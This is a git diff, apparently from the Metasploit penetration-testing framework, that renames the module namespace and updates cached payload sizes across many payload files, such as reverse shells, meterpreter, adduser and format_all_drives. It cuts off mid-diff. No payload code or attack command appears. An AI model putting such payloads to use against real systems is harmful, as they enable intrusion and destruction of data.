Metasploit3 +module MetasploitModule CachedSize = 164 diff --git a/modules/payloads/singles/osx/x64/exec.rb b/modules/payloads/singles/osx/x64/exec.rb index 126b9b4433..c87e29badd 100644 --- a/modules/payloads/singles/osx/x64/exec.rb +++ b/modules/payloads/singles/osx/x64/exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 31 diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb index a270e4ee5a..09532e4ec3 100644 --- a/modules/payloads/singles/osx/x64/say.rb +++ b/modules/payloads/singles/osx/x64/say.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 53 diff --git a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb index 246bbcc2b2..e4d1f0dcc3 100644 --- a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb index e10354938a..5a4644b817 100644 --- a/modules/payloads/singles/osx/x64/shell_find_tag.rb +++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 107 diff --git a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb index 13e4586d5b..ace5a6988a 100644 --- a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 108 diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index 688f654fb0..65a42cb5bd 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -14,7 +14,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 24 diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb index 3ceef27567..3cdd12ad3e 100644 --- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 74 diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb index a73ce6d16a..2304a33ea8 100644 --- a/modules/payloads/singles/osx/x86/shell_find_port.rb +++ b/modules/payloads/singles/osx/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 61 diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb index 448d9fcd01..d8a4057d56 100644 --- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 65 diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb index d40d2cdaf7..c85f1efd8e 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb index 3803a6ce9c..403ee15239 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 131 diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb index a40a20d88e..f7009ff787 100644 --- a/modules/payloads/singles/php/bind_perl.rb +++ b/modules/payloads/singles/php/bind_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 230 diff --git a/modules/payloads/singles/php/bind_perl_ipv6.rb b/modules/payloads/singles/php/bind_perl_ipv6.rb index f16b2c7b48..63402cbd52 100644 --- a/modules/payloads/singles/php/bind_perl_ipv6.rb +++ b/modules/payloads/singles/php/bind_perl_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 230 diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb index 0ffbedb343..f6a35f64cb 100644 --- a/modules/payloads/singles/php/bind_php.rb +++ b/modules/payloads/singles/php/bind_php.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/bind_php_ipv6.rb b/modules/payloads/singles/php/bind_php_ipv6.rb index 130f4320d1..5507578205 100644 --- a/modules/payloads/singles/php/bind_php_ipv6.rb +++ b/modules/payloads/singles/php/bind_php_ipv6.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb index 7fa71530b1..c0f5941236 100644 --- a/modules/payloads/singles/php/download_exec.rb +++ b/modules/payloads/singles/php/download_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/payload/php' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 3fce154d8c..09b07f6530 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index fff36fc4d5..2231bdda47 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -10,9 +10,9 @@ require 'msf/base/sessions/meterpreter_php' require 'msf/base/sessions/meterpreter_options' -module Metasploit4 +module MetasploitModule - CachedSize = 26205 + CachedSize = 26778 include Msf::Payload::Single include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/singles/php/reverse_perl.rb b/modules/payloads/singles/php/reverse_perl.rb index 0cd13b8e44..194c5b90fa 100644 --- a/modules/payloads/singles/php/reverse_perl.rb +++ b/modules/payloads/singles/php/reverse_perl.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb index 0e089fdab3..95b71cea29 100644 --- a/modules/payloads/singles/php/reverse_php.rb +++ b/modules/payloads/singles/php/reverse_php.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb index fa366b6bb7..1595e817e7 100644 --- a/modules/payloads/singles/php/shell_findsock.rb +++ b/modules/payloads/singles/php/shell_findsock.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' require 'msf/core/handler/find_shell' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 395962145f..db95d43a5e 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -10,9 +10,9 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/core/payload/python/bind_tcp' require 'msf/base/sessions/meterpreter_python' -module Metasploit4 +module MetasploitModule - CachedSize = 50226 + CachedSize = 51630 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 44369a42a9..0e6c39e5de 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -10,9 +10,9 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/core/payload/python/reverse_http' require 'msf/base/sessions/meterpreter_python' -module Metasploit4 +module MetasploitModule - CachedSize = 50190 + CachedSize = 51590 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index efdecac0bc..4ce34b05c2 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -10,9 +10,9 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/core/payload/python/reverse_http' require 'msf/base/sessions/meterpreter_python' -module Metasploit4 +module MetasploitModule - CachedSize = 50190 + CachedSize = 51594 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 7988da15eb..fbce238351 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -10,9 +10,9 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/core/payload/python/reverse_tcp' require 'msf/base/sessions/meterpreter_python' -module Metasploit4 +module MetasploitModule - CachedSize = 50146 + CachedSize = 51546 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb index 2a7ceb923f..372ce0e4fd 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 401 diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb index c3e6eb0765..ca80b41475 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 557 diff --git a/modules/payloads/singles/ruby/shell_bind_tcp.rb b/modules/payloads/singles/ruby/shell_bind_tcp.rb index 943a4fe242..b8554cbe4f 100644 --- a/modules/payloads/singles/ruby/shell_bind_tcp.rb +++ b/modules/payloads/singles/ruby/shell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 516 diff --git a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb index 071ae85179..f084531e39 100644 --- a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 524 diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index 72db7766bd..cf4cb17543 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 516 diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb index 0f16cba516..b2c7bef693 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 444 diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb index 1605bdd0ae..ed921903ab 100644 --- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 180 diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb index 6027131f48..050d136438 100644 --- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb +++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb index 6957558e47..6d29055d6f 100644 --- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 144 diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb index f90d730769..d8360af809 100644 --- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 95 diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb index 63f6835cfc..c06c224c1e 100644 --- a/modules/payloads/singles/solaris/x86/shell_find_port.rb +++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 86 diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb index 8263e301da..14b2b37855 100644 --- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 91 diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb index 71ef428f1d..af1d155348 100644 --- a/modules/payloads/singles/tty/unix/interact.rb +++ b/modules/payloads/singles/tty/unix/interact.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/find_tty' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb index ce3d1fd43c..3c20929862 100644 --- a/modules/payloads/singles/windows/adduser.rb +++ b/modules/payloads/singles/windows/adduser.rb @@ -13,7 +13,7 @@ require 'msf/core/payload/windows/exec' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 282 diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb index dcb1415381..943fbec81f 100644 --- a/modules/payloads/singles/windows/dns_txt_query_exec.rb +++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 285 diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index 3ecde4535b..1354a8d750 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 423 diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index 436c0c3dfe..4df00b2d8f 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -11,7 +11,7 @@ require 'msf/core/payload/windows/exec' # Executes a command on the target machine # ### -module Metasploit3 +module MetasploitModule CachedSize = 192 diff --git a/modules/payloads/singles/windows/format_all_drives.rb b/modules/payloads/singles/windows/format_all_drives.rb index b9b0d580d4..e8a446f189 100644 --- a/modules/payloads/singles/windows/format_all_drives.rb +++ b/modules/payloads/singles/windows/format_all_drives.rb @@ -14,7 +14,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 393 diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb index e0072623c0..8fe7335668 100644 --- a/modules/payloads/singles/windows/loadlibrary.rb +++ b/modules/payloads/singles/windows/loadlibrary.rb @@ -11,7 +11,7 @@ require 'msf/core/payload/windows/loadlibrary' # Executes a command on the target machine # ### -module Metasploit3 +module MetasploitModule CachedSize = 230 diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb index 291d792b63..88ee9f8ccf 100644 --- a/modules/payloads/singles/windows/messagebox.rb +++ b/modules/payloads/singles/windows/messagebox.rb @@ -7,7 +7,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 272 diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 35cca34308..4aba839b4d 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index cf8c6f0fd1..9b1ac80418 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 958531 + CachedSize = 959043 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 32fe451235..91b073a44b 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 958531 + CachedSize = 959043 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 831e479db2..8cdbd91f25 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index f84eac31bd..e2c6f3a72b 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit3 +module MetasploitModule - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/metsvc_bind_tcp.rb b/modules/payloads/singles/windows/metsvc_bind_tcp.rb index 69ffe8e323..c38bd1693c 100644 --- a/modules/payloads/singles/windows/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb index 0fd1c8a955..898c4c71ab 100644 --- a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb index 95ef7b26c2..2d1e407e83 100644 --- a/modules/payloads/singles/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1703 diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb index 487c0d8d35..b822413140 100644 --- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp_ssl' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1711 diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb index d3059320ea..fc8d6d0f72 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 328 diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index 54ba7077c8..584368c19f 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 529 diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index ac19a35a63..0416b159d4 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 386 diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb index dd4c6d1167..4ca47a3d69 100644 --- a/modules/payloads/singles/windows/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 324 diff --git a/modules/payloads/singles/windows/speak_pwned.rb b/modules/payloads/singles/windows/speak_pwned.rb index 579e6863a1..c9f0e8ad52 100644 --- a/modules/payloads/singles/windows/speak_pwned.rb +++ b/modules/payloads/singles/windows/speak_pwned.rb @@ -38,7 +38,7 @@ require 'msf/core' require 'msf/core/payload/windows/exec' -module Metasploit3 +module MetasploitModule CachedSize = 247 diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb index 92455a5b9b..af38b18781 100644 --- a/modules/payloads/singles/windows/x64/exec.rb +++ b/modules/payloads/singles/windows/x64/exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 275 diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb index 8a8141c20b..d0ec05ceed 100644 --- a/modules/payloads/singles/windows/x64/loadlibrary.rb +++ b/modules/payloads/singles/windows/x64/loadlibrary.rb @@ -7,7 +7,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 313 diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 100760fd6d..493bfbf557 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 7d493b49e9..ee87c288fe 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 951dad4425..43d0262094 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ 